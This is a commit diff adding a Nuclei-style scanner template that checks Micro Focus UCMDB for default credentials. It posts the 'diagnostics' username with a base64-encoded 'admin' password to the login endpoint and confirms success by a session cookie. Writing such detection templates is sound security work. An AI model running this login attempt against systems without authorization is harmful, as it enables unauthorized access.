🔨 Add Micro Focus UCMDB Default Credentials
parent
4fb3b338a0
commit
a1a3a86477
|
@ -0,0 +1,22 @@
|
|||
id: micro-focus-ucmdb-default-credentials
|
||||
|
||||
info:
|
||||
name: Micro Focus UCMDB Default Credentials
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
tags: ucmdb,dlogin
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
|
||||
body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "LWSSO_COOKIE_KEY"
|
||||
part: header
|
Loading…
Reference in New Issue